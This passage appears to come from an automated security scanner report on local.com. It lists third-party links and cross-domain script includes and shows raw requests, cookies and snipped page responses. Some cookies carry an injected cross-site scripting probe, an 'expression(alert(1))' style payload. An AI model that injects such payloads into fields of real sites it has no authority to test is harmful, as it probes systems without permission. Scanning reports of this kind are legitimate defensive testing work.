http://static.eventful.com/images/block/I0-001/001/683/284-3.jpeg
http://static.eventful.com/images/block/I0-001/002/303/428-1.tiff
http://static.eventful.com/images/block/I0-001/002/769/173-8.jpeg
http://static.eventful.com/images/block/I0-001/003/720/731-6.jpeg
http://static.eventful.com/images/medium/I0-001/000/667/020-8.jpeg
http://static.eventful.com/images/medium/I0-001/001/000/622-4.jpeg
http://static.eventful.com/images/medium/I0-001/001/683/284-3.jpeg
http://static.eventful.com/images/medium/I0-001/002/769/173-8.jpeg
http://weather.weatherbug.com/?zip=75201&zcode=6292
http://www.facebook.com/local.com/
http://www.omniture.com/

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Cteonnt-Length: 86268
Date: Thu, 03 Feb 2011 16:44:31 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428; domain=www.local.com; expires=Wed, 02-Feb-2011 16:44:31 GMT; path=/
Set-Cookie: localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058&events.kw=none; domain=local.com; expires=Sat, 05-Mar-2011 15:56:17 GMT; path=/
Content-Length: 86268

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en-us">
<head>
<title>Dallas Local Events | Find co
...[SNIP]...
</div>
                <a omn_key="EL:100:1:1011" onclick="return loc_click(this);" href="http://weather.weatherbug.com/?zip=75201&zcode=6292" target="_blank">
                <img src="/skins/default/images/wBugLogo.jpg" alt="WeatherBug" class="mT5" />
...[SNIP]...
<a href="/events/event/E0-001-033788684-0/monster-jam.aspx" omn_key="EL:104:1:1110" onclick="return loc_click(this);">
        <img src="http://static.eventful.com/images/block/I0-001/003/720/731-6.jpeg" height="128" width="128" />
    </a>
...[SNIP]...
<a href="/events/event/E0-001-033819481-6/mamma-mia.aspx" omn_key="EL:104:1:1110" onclick="return loc_click(this);">
        <img src="http://static.eventful.com/images/block/I0-001/001/683/284-3.jpeg" height="128" width="128" />
    </a>
...[SNIP]...
events/event/E0-001-035569775-4/jack-daniels-kick-off-party-featuring-the-flaming-lips-with-flaming-lips-neon-indian.aspx" omn_key="EL:104:1:1110" onclick="return loc_click(this);">
        <img src="http://static.eventful.com/images/block/I0-001/002/769/173-8.jpeg" height="128" width="128" />
    </a>
...[SNIP]...
<a href="/events/event/E0-001-036541003-9/lmfao-party-rock-bowl.aspx" omn_key="EL:104:1:1110" onclick="return loc_click(this);">
        <img src="http://static.eventful.com/images/block/I0-001/001/343/721-2.jpeg" height="128" width="128" />
    </a>
...[SNIP]...
<a href="/events/event/E0-001-036528289-8/kid-rock-with-jamey-johnson.aspx" omn_key="EL:104:1:1110" onclick="return loc_click(this);">
        <img src="http://static.eventful.com/images/block/I0-001/001/000/622-4.jpeg" height="128" width="128" />
    </a>
...[SNIP]...
<a href="/events/event/E0-001-034504708-4/mamma-mia.aspx" omn_key="EL:104:1:1110" onclick="return loc_click(this);">
        <img src="http://static.eventful.com/images/block/I0-001/001/683/284-3.jpeg" height="128" width="128" />
    </a>
...[SNIP]...
<a href="/events/event/E0-001-035437927-7/robyn.aspx" omn_key="EL:104:1:1110" onclick="return loc_click(this);">
        <img src="http://static.eventful.com/images/block/I0-001/001/003/000-9.jpeg" height="128" width="128" />
    </a>
...[SNIP]...
<a href="/events/event/E0-001-035090047-7/reverend-horton-heat.aspx" omn_key="EL:104:1:1110" onclick="return loc_click(this);">
        <img src="http://static.eventful.com/images/block/I0-001/001/494/846-9.jpeg" height="128" width="128" />
    </a>
...[SNIP]...
<a href="/events/event/E0-001-035615459-3/flogging-mollymoneybrotherthe-drowning-men.aspx" omn_key="EL:104:1:1110" onclick="return loc_click(this);">
        <img src="http://static.eventful.com/images/block/I0-001/002/303/428-1.tiff" height="128" width="128" />
    </a>
...[SNIP]...
events/event/E0-001-035569775-4/jack-daniels-kick-off-party-featuring-the-flaming-lips-with-flaming-lips-neon-indian.aspx" omn_key="EL:103:1:1110" onclick="return loc_click(this);">
        <img src="http://static.eventful.com/images/medium/I0-001/002/769/173-8.jpeg" height="68" width="89" />
    </a>
...[SNIP]...
<a href="/events/event/E0-001-036528289-8/kid-rock-with-jamey-johnson.aspx" omn_key="EL:103:2:1110" onclick="return loc_click(this);">
        <img src="http://static.eventful.com/images/medium/I0-001/001/000/622-4.jpeg" height="68" width="89" />
    </a>
...[SNIP]...
<a href="/events/event/E0-001-033894723-6@2011020319/mamma-mia.aspx" omn_key="EL:103:4:1110" onclick="return loc_click(this);">
        <img src="http://static.eventful.com/images/medium/I0-001/001/683/284-3.jpeg" height="68" width="89" />
    </a>
...[SNIP]...
<a href="/events/event/E0-001-036610977-8/ghostmanrick-ross.aspx" omn_key="EL:103:5:1110" onclick="return loc_click(this);">
        <img src="http://static.eventful.com/images/medium/I0-001/000/667/020-8.jpeg" height="68" width="89" />
    </a>
...[SNIP]...
</a>
           <script src="http://cf.kampyle.com/k_button.js" type="text/javascript"></script>
...[SNIP]...
<div class="facebook">
                   <a href="http://www.facebook.com/local.com/" target="_blank" alt="Recommend Local.com on Facebook" title="Recommend Local.com on Facebook" class="fBookButton" omn_key="EL:101:1:1014" onclick="return loc_click(this);">
                   </a>
...[SNIP]...
<noscript><a href="http://www.omniture.com" title="Web Analytics"><img src="ic-hulk2010production.122.2O7.net/b/ss/ic-hulk2010production/1/H.17--NS/0?pageName=Events+-+Landing" height="1" width="1" border="0" alt="" />
...[SNIP]...
<noscript>
<img src="http://b.scorecardresearch.com/p?c1=2&c2=&c3=&c4=&c5=&c6=&c15=&cj=1" />
</noscript>

<script type="text/javascript" src="http://loadus.exelator.com/load/?p=235&g=001&ctg=&cat=&state=TX&city=Dallas&kw=none"></script>
...[SNIP]...

8.64. http://www.local.com/results.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.local.com
Path:	/results.aspx

Issue detail

The page was loaded from a URL containing a query string:

http://www.local.com/results.aspx?keyword=banks&cid=506&client=ca-dp-r-mark03_3ph_js

The response contains the following links to other domains:

http://b.scorecardresearch.com/p?c1=2&c2=&c3=&c4=&c5=&c6=&c15=&cj=1
http://cf.kampyle.com/k_button.js
http://cr0.worthathousandwords.com/2/34/6A/30B42E6DFC996D2DEB1132BD4BC.jpg?pid=5650.508&qs=yvFfhopy%29jh%7D%3E%7C%7Dz7esm%7E4fxq-uyr%40Jpsz%25HdwoA%21Ttorrl%21Ggqtmuh%25Lr%7B%24%60pzx%23Kyzz%25Rloi-ejy%40Pvlby%26Vjzpoly%23Jgjpztw%29Vhujy%236%24Vqjt%23Jr%27Bhir%7Er%7B%21Nt%23Syzu%25G%23Oi%7E%21Roq%7Exlt%26
http://cr0.worthathousandwords.com/2/34/6A/30B42E6DFC996D2DEB1132BD4BC.jpg?pid=5650.508&qs=yvFfhopy%29jh%7D%3E%7C%7Dz7esm%7E4fxq-uyr%40Jpsz%25HdwoA%21Xzujmniylr%7B%7Bhsi%26Rwppoj%26Vjzpoly%23Jgjpztw%7C*kfxCOnekjsm%23Keul%25Xd%7Diz%21%7Cowq%24Up%25Zhjwlsx4%23OHPD%25Oq%7Cyyfi2Qx%24Tjsop%7Eqz%21tx%23Oilt3
http://cr0.worthathousandwords.com/2/34/6A/30B42E6DFC996D2DEB1132BD4BC.jpg?pid=5650.508&qs=yvFfhopy%29jh%7D%3E%7C%7Dz7esm%7E4fxq-uyr%40Jpsz%25HdwoA%21Ynh%29Fhop%26Wqe%7B%21Ny%23%60llsj%7Ch%7B%24%60pz%26D%7Bi-ejy%40Xrsjsk%23Keulntj%29Xoby%26Pni%7Bt%25_r%7Ev%27Ojkg%7C2%27Pukq%29Eu%21Fifxyuu%25%5Dl%7Dl%27Bqr%7C%29Xvef%7F%24725
http://cr0.worthathousandwords.com/F/91/8C/C50B3135FB4C3E4E8539650C6ED.jpg?pid=5650.508&qs=yvFfhopy%29jh%7D%3E%7C%7Dz7kzcrzj7gvn%2BzwuATpwzjjklt%25%2C%23%5Bimjsgqlmuh%2Bjh%7CAHqur%7C%29jvs%25g%23Vsyulgjn%24vs%25Xhomubsih%29Rvx3%26J%7Bihu%25Xd%7Diz%2F%25Mujtlwnth5%24%5BY3
http://loadus.exelator.com/load/?p=235&g=001&ctg=Retail+Banks&cat=financial_services&state=TX&city=Dallas&kw=banks
http://weather.weatherbug.com/?zip=75201&zcode=6292
http://www.1stcb.com/
http://www.cetproducts.com/
http://www.facebook.com/local.com/
http://www.omniture.com/
http://www.shareplus.com/

Request

GET /results.aspx?keyword=banks&cid=506&client=ca-dp-r-mark03_3ph_js HTTP/1.1
Host: www.local.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BIGipServercommunity.local.pluck.com.sitelife-80=596379914.20480.0000; k_visit=1; localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428; __utmz=177062200.1296748820.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; s_sq=%5B%5BB%5D%5D; campid=506; ym_pop_freq1421534=1; ym_pop_freq_expiration1421534=Fri, 04 Feb 2011 16:01:44 GMT; localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; anonId=101d4217-dda7-4536-8a17-9bdfc4b5b95f; s_cc=true; s_vi=[CS]v1|26A56884851D1175-60000145004A830C[CE]; s_nr=1296748831212; session_start_time=1296748820317; __utma=177062200.66342387.1296748820.1296748820.1296748820.1; SiteLifeHost=SJL01WSITELCL01proddmlocal; localuserid=5abc3b67-eaa3-419d-81c2-41a43cc0eb62; __utmc=177062200; ASP.NET_SessionId=asnxtpi5da2ya3454rhwd045; __utmb=177062200.8.10.1296748820; __qca=P0-30084348-1296748820628;

Response

8.65. http://www.local.com/results/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.local.com
Path:	/results/

Issue detail

The page was loaded from a URL containing a query string:

http://www.local.com/results/?keyword=american+restaurants&location=dallas%2c+tx

The response contains the following links to other domains:

http://b.scorecardresearch.com/p?c1=2&c2=&c3=&c4=&c5=&c6=&c15=&cj=1
http://cf.kampyle.com/k_button.js
http://cr0.worthathousandwords.com/7/C2/E0/CBA8D2FF45F4D7B2ED9F9EB85C7.jpg?pid=5650.508&qs=yvFetfwofjr%27sjywjyybszv%2FekwBgokiyux%7Fdlxzfw%7Cllizefrojw5vxjl%7Bijutx%7C7gvn%2BzwuAHmgku%7D%2Bz%21%5Egf%7D%24Zfw%7Clliz%27ikvFRvsyn%23Jqlsnidw%24Yfxzd%7Evhoyy
http://cr0.worthathousandwords.com/B/95/36/F2AFE09449B8C112721A6E146D7.jpg?pid=5650.508&qs=yvFetfwofjr%27sjywjyybszv%2FekwBko%7Cywfwzdlskbqrd%7C2%7Ctioung%7Bpw%7F1lst%27yzoFIs%21X%7Bsnv%27Ufir%2FhltBXh%7Cxhvwgq%7Dw%27Brkurgho
http://cr0.worthathousandwords.com/F/B7/D7/61CDA89562FAC0787F306E449CF.jpg?pid=5650.508&qs=yvFetfwofjr%27sjywjyybszv%2FekwB%7Dz%C2%802mptji%7Bmloi%C2%801lst%27yzoFJvpiLuriue%7F4fxq-ejy%40%5Cm%7B%21Ggft%25%27Sjrd%C2%81%25%27Mjz%23%7Ew%27et%26wqi%27sjyw725%2F341
http://loadus.exelator.com/load/?p=235&g=001&ctg=Pizza+Restaurant&cat=entertainment_leisure&state=TX&city=Dallas&kw=american+restaurants
http://weather.weatherbug.com/?zip=75201&zcode=6292
http://www.facebook.com/local.com/
http://www.omniture.com/

Request

Response

8.66. http://www.local.com/topics/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.local.com
Path:	/topics/

Issue detail

The page was loaded from a URL containing a query string:

http://www.local.com/topics/?topic=food&keyword=food

The response contains the following links to other domains:

http://b.scorecardresearch.com/p?c1=2&c2=&c3=&c4=&c5=&c6=&c15=&cj=1
http://cf.kampyle.com/k_button.js
http://loadus.exelator.com/load/?p=235&g=001&ctg=Food+And+Dining&cat=&state=TX&city=Dallas&kw=food
http://s.skimresources.com/js/9174X678702.skimlinks.js
http://static.eventful.com/images/small/I0-001/003/720/731-6.jpeg
http://vrdcimage.restaurant.com/microsites/349918photo1.jpg
http://weather.weatherbug.com/?zip=75201&zcode=6292
http://www.facebook.com/local.com/
http://www.groupon.com/images/site_images/0523/9062/B_b_bop_Rice_Bowls2.jpg
http://www.omniture.com/

Request

Response

9. Cross-domain script include previous next
There are 41 instances of this issue:

/
/business/
/business/details/dallas-tx/amegy-bank-97648000/
/business/details/dallas-tx/cet-products-liquidators-9985416/
/business/details/dallas-tx/equity-bank-63975058/
/business/details/dallas-tx/hillcrest-bank-104826937/
/business/details/dallas-tx/sterling-bank-16856575/
/business/details/map/dallas-tx/amegy-bank-97648000/
/business/details/map/dallas-tx/cet-products-liquidators-9985416/
/business/details/map/dallas-tx/equity-bank-63975058/
/business/details/map/dallas-tx/hillcrest-bank-104826937/
/business/details/map/dallas-tx/sterling-bank-16856575/
/business/results/
/business/results/
/contact.aspx
/coupons/
/coupons/printable/
/details/photos/dallas-tx/amegy-bank-97648000/
/details/photos/dallas-tx/cet-products-liquidators-9985416/
/details/photos/dallas-tx/equity-bank-63975058/
/details/photos/dallas-tx/hillcrest-bank-104826937/
/details/photos/dallas-tx/sterling-bank-16856575/
/dialogs/account/acctreg.aspx
/dialogs/register.aspx
/events/
/events/category/music/dallas-tx.aspx
/events/category/performing-arts/dallas-tx.aspx
/events/category/sports/dallas-tx.aspx
/faq.aspx
/privacy/
/results.aspx
/results.aspx
/results/
/results/
/sitemap.aspx
/sitemap/chicago-il.aspx
/sitemap/los-angeles-ca.aspx
/sitemap/new-york-ny.aspx
/terms/
/topics/
/topics/

Issue background

When an application includes a script from an external domain, this script is executed by the browser within the security context of the invoking application. The script can therefore do anything that the application's own scripts can do, such as accessing application data and performing actions within the context of the current user.

If you include a script from an external domain, then you are trusting that domain with the data and functionality of your application, and you are trusting the domain's own security to prevent an attacker from modifying the script to perform malicious actions within your application.

Issue remediation

Scripts should not be included from untrusted domains. If you have a requirement which a third-party script appears to fulfil, then you should ideally copy the contents of that script onto your own domain and include it from there. If that is not possible (e.g. for licensing reasons) then you should consider reimplementing the script's functionality within your own code.

9.1. http://www.local.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.local.com
Path:	/

Issue detail

The response dynamically includes the following scripts from other domains:

http://cf.kampyle.com/k_button.js
http://loadus.exelator.com/load/?p=235&g=001&ctg=&cat=&state=TX&city=Dallas&kw=banks

Request

GET / HTTP/1.1
Host: www.local.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BIGipServercommunity.local.pluck.com.sitelife-80=596379914.20480.0000; k_visit=1; localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428; __utmz=177062200.1296748820.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; s_sq=%5B%5BB%5D%5D; campid=506; ym_pop_freq1421534=1; ym_pop_freq_expiration1421534=Fri, 04 Feb 2011 16:01:44 GMT; localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; anonId=101d4217-dda7-4536-8a17-9bdfc4b5b95f; s_cc=true; s_vi=[CS]v1|26A56884851D1175-60000145004A830C[CE]; s_nr=1296748831212; session_start_time=1296748820317; __utma=177062200.66342387.1296748820.1296748820.1296748820.1; SiteLifeHost=SJL01WSITELCL01proddmlocal; localuserid=5abc3b67-eaa3-419d-81c2-41a43cc0eb62; __utmc=177062200; ASP.NET_SessionId=asnxtpi5da2ya3454rhwd045; __utmb=177062200.8.10.1296748820; __qca=P0-30084348-1296748820628;

Response

9.2. http://www.local.com/business/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.local.com
Path:	/business/

Issue detail

The response dynamically includes the following scripts from other domains:

http://cf.kampyle.com/k_button.js
http://loadus.exelator.com/load/?p=235&g=001&ctg=&cat=&state=TX&city=Dallas&kw=banks

Request

Response

9.3. http://www.local.com/business/details/dallas-tx/amegy-bank-97648000/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.local.com
Path:	/business/details/dallas-tx/amegy-bank-97648000/

Issue detail

The response dynamically includes the following scripts from other domains:

http://cf.kampyle.com/k_button.js
http://code.jquery.com/jquery-1.4.2.min.js
http://ecn.dev.virtualearth.net/MapControl/mapcontrol.ashx?v=6.3c
http://loadus.exelator.com/load/?p=235&g=001&ctg=&cat=&state=TX&city=Dallas&kw=banks

Request

Response

9.4. http://www.local.com/business/details/dallas-tx/cet-products-liquidators-9985416/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.local.com
Path:	/business/details/dallas-tx/cet-products-liquidators-9985416/

Issue detail

The response dynamically includes the following scripts from other domains:

http://cf.kampyle.com/k_button.js
http://code.jquery.com/jquery-1.4.2.min.js
http://ecn.dev.virtualearth.net/MapControl/mapcontrol.ashx?v=6.3c
http://loadus.exelator.com/load/?p=235&g=001&ctg=&cat=&state=TX&city=Dallas&kw=banks

Request

Response

9.5. http://www.local.com/business/details/dallas-tx/equity-bank-63975058/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.local.com
Path:	/business/details/dallas-tx/equity-bank-63975058/

Issue detail

The response dynamically includes the following scripts from other domains:

http://cf.kampyle.com/k_button.js
http://code.jquery.com/jquery-1.4.2.min.js
http://ecn.dev.virtualearth.net/MapControl/mapcontrol.ashx?v=6.3c
http://loadus.exelator.com/load/?p=235&g=001&ctg=&cat=&state=TX&city=Dallas&kw=banks

Request

Response

9.6. http://www.local.com/business/details/dallas-tx/hillcrest-bank-104826937/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.local.com
Path:	/business/details/dallas-tx/hillcrest-bank-104826937/

Issue detail

The response dynamically includes the following scripts from other domains:

http://cf.kampyle.com/k_button.js
http://code.jquery.com/jquery-1.4.2.min.js
http://ecn.dev.virtualearth.net/MapControl/mapcontrol.ashx?v=6.3c
http://loadus.exelator.com/load/?p=235&g=001&ctg=&cat=&state=TX&city=Dallas&kw=banks

Request

Response

9.7. http://www.local.com/business/details/dallas-tx/sterling-bank-16856575/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.local.com
Path:	/business/details/dallas-tx/sterling-bank-16856575/

Issue detail

The response dynamically includes the following scripts from other domains:

http://cf.kampyle.com/k_button.js
http://code.jquery.com/jquery-1.4.2.min.js
http://ecn.dev.virtualearth.net/MapControl/mapcontrol.ashx?v=6.3c
http://loadus.exelator.com/load/?p=235&g=001&ctg=&cat=&state=TX&city=Dallas&kw=banks

Request

Response

9.8. http://www.local.com/business/details/map/dallas-tx/amegy-bank-97648000/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.local.com
Path:	/business/details/map/dallas-tx/amegy-bank-97648000/

Issue detail

The response dynamically includes the following scripts from other domains:

http://cf.kampyle.com/k_button.js
http://code.jquery.com/jquery-1.4.2.min.js
http://ecn.dev.virtualearth.net/MapControl/mapcontrol.ashx?v=6.3
http://loadus.exelator.com/load/?p=235&g=001&ctg=&cat=&state=TX&city=Dallas&kw=banks

Request

Response

9.9. http://www.local.com/business/details/map/dallas-tx/cet-products-liquidators-9985416/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.local.com
Path:	/business/details/map/dallas-tx/cet-products-liquidators-9985416/

Issue detail

The response dynamically includes the following scripts from other domains:

http://cf.kampyle.com/k_button.js
http://code.jquery.com/jquery-1.4.2.min.js
http://ecn.dev.virtualearth.net/MapControl/mapcontrol.ashx?v=6.3
http://loadus.exelator.com/load/?p=235&g=001&ctg=&cat=&state=TX&city=Dallas&kw=banks

Request

Response

9.10. http://www.local.com/business/details/map/dallas-tx/equity-bank-63975058/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.local.com
Path:	/business/details/map/dallas-tx/equity-bank-63975058/

Issue detail

The response dynamically includes the following scripts from other domains:

http://cf.kampyle.com/k_button.js
http://code.jquery.com/jquery-1.4.2.min.js
http://ecn.dev.virtualearth.net/MapControl/mapcontrol.ashx?v=6.3
http://loadus.exelator.com/load/?p=235&g=001&ctg=&cat=&state=TX&city=Dallas&kw=banks

Request

Response

9.11. http://www.local.com/business/details/map/dallas-tx/hillcrest-bank-104826937/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.local.com
Path:	/business/details/map/dallas-tx/hillcrest-bank-104826937/

Issue detail

The response dynamically includes the following scripts from other domains:

http://cf.kampyle.com/k_button.js
http://code.jquery.com/jquery-1.4.2.min.js
http://ecn.dev.virtualearth.net/MapControl/mapcontrol.ashx?v=6.3
http://loadus.exelator.com/load/?p=235&g=001&ctg=&cat=&state=TX&city=Dallas&kw=banks

Request

Response

9.12. http://www.local.com/business/details/map/dallas-tx/sterling-bank-16856575/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.local.com
Path:	/business/details/map/dallas-tx/sterling-bank-16856575/

Issue detail

The response dynamically includes the following scripts from other domains:

http://cf.kampyle.com/k_button.js
http://code.jquery.com/jquery-1.4.2.min.js
http://ecn.dev.virtualearth.net/MapControl/mapcontrol.ashx?v=6.3
http://loadus.exelator.com/load/?p=235&g=001&ctg=&cat=&state=TX&city=Dallas&kw=banks

Request

Response

9.13. http://www.local.com/business/results/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.local.com
Path:	/business/results/

Issue detail

The response dynamically includes the following scripts from other domains:

http://cf.kampyle.com/k_button.js
http://loadus.exelator.com/load/?p=235&g=001&ctg=Retail+Banks&cat=financial_services&state=TX&city=Dallas&kw=banks

Request

Response

9.14. http://www.local.com/business/results/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.local.com
Path:	/business/results/

Issue detail

The response dynamically includes the following scripts from other domains:

http://cf.kampyle.com/k_button.js
http://loadus.exelator.com/load/?p=235&g=001&ctg=Food+And+Dining&cat=&state=TX&city=Dallas&kw=restaurants

Request

Response

9.15. http://www.local.com/contact.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.local.com
Path:	/contact.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

http://cf.kampyle.com/k_button.js
http://loadus.exelator.com/load/?p=235&g=001&ctg=&cat=&state=TX&city=Dallas&kw=banks

Request

Response

9.16. http://www.local.com/coupons/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.local.com
Path:	/coupons/

Issue detail

The response dynamically includes the following scripts from other domains:

http://cf.kampyle.com/k_button.js
http://ecn.dev.virtualearth.net/mapcontrol/mapcontrol.ashx?v=6.3c
http://loadus.exelator.com/load/?p=235&g=001&ctg=&cat=&state=TX&city=Dallas&kw=

Request

Response

9.17. http://www.local.com/coupons/printable/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.local.com
Path:	/coupons/printable/

Issue detail

The response dynamically includes the following scripts from other domains:

http://cf.kampyle.com/k_button.js
http://loadus.exelator.com/load/?p=235&g=001&ctg=&cat=&state=TX&city=Dallas&kw=banks

Request

Response

HTTP/1.1 404 Not Found
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Cteonnt-Length: 25463
Date: Thu, 03 Feb 2011 16:45:55 GMT
Content-Length: 25463
Connection: close
Set-Cookie: localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428; domain=www.local.com; expires=Wed, 02-Feb-2011 16:45:55 GMT; path=/
Set-Cookie: localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; domain=local.com; expires=Sat, 05-Mar-2011 15:56:17 GMT; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en-us">
<head>
<title>Not Found - Local.com</title>
...[SNIP]...
</a>
<script src="http://cf.kampyle.com/k_button.js" type="text/javascript"></script>
...[SNIP]...
</noscript>

<script type="text/javascript" src="http://loadus.exelator.com/load/?p=235&g=001&ctg=&cat=&state=TX&city=Dallas&kw=banks"></script>
...[SNIP]...

9.18. http://www.local.com/details/photos/dallas-tx/amegy-bank-97648000/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.local.com
Path:	/details/photos/dallas-tx/amegy-bank-97648000/

Issue detail

The response dynamically includes the following script from another domain:

http://loadus.exelator.com/load/?p=235&g=001&ctg=Food+And+Dining&cat=&state=TX&city=Dallas&kw=banks

Request

Response

9.19. http://www.local.com/details/photos/dallas-tx/cet-products-liquidators-9985416/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.local.com
Path:	/details/photos/dallas-tx/cet-products-liquidators-9985416/

Issue detail

The response dynamically includes the following script from another domain:

http://loadus.exelator.com/load/?p=235&g=001&ctg=Food+And+Dining&cat=&state=TX&city=Dallas&kw=banks

Request

Response

9.20. http://www.local.com/details/photos/dallas-tx/equity-bank-63975058/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.local.com
Path:	/details/photos/dallas-tx/equity-bank-63975058/

Issue detail

The response dynamically includes the following script from another domain:

http://loadus.exelator.com/load/?p=235&g=001&ctg=Food+And+Dining&cat=&state=TX&city=Dallas&kw=banks

Request

Response

9.21. http://www.local.com/details/photos/dallas-tx/hillcrest-bank-104826937/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.local.com
Path:	/details/photos/dallas-tx/hillcrest-bank-104826937/

Issue detail

The response dynamically includes the following script from another domain:

http://loadus.exelator.com/load/?p=235&g=001&ctg=Food+And+Dining&cat=&state=TX&city=Dallas&kw=banks

Request

Response

9.22. http://www.local.com/details/photos/dallas-tx/sterling-bank-16856575/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.local.com
Path:	/details/photos/dallas-tx/sterling-bank-16856575/

Issue detail

The response dynamically includes the following script from another domain:

http://loadus.exelator.com/load/?p=235&g=001&ctg=Food+And+Dining&cat=&state=TX&city=Dallas&kw=banks

Request

Response

9.23. http://www.local.com/dialogs/account/acctreg.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.local.com
Path:	/dialogs/account/acctreg.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://loadus.exelator.com/load/?p=235&g=001&ctg=&cat=&state=TX&city=Dallas&kw=banks

Request

Response

9.24. http://www.local.com/dialogs/register.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.local.com
Path:	/dialogs/register.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://loadus.exelator.com/load/?p=235&g=001&ctg=&cat=&state=TX&city=Dallas&kw=banks

Request

Response

9.25. http://www.local.com/events/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.local.com
Path:	/events/

Issue detail

The response dynamically includes the following scripts from other domains:

http://cf.kampyle.com/k_button.js
http://loadus.exelator.com/load/?p=235&g=001&ctg=&cat=&state=TX&city=Dallas&kw=none

Request

Response

9.26. http://www.local.com/events/category/music/dallas-tx.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.local.com
Path:	/events/category/music/dallas-tx.aspx

Issue detail

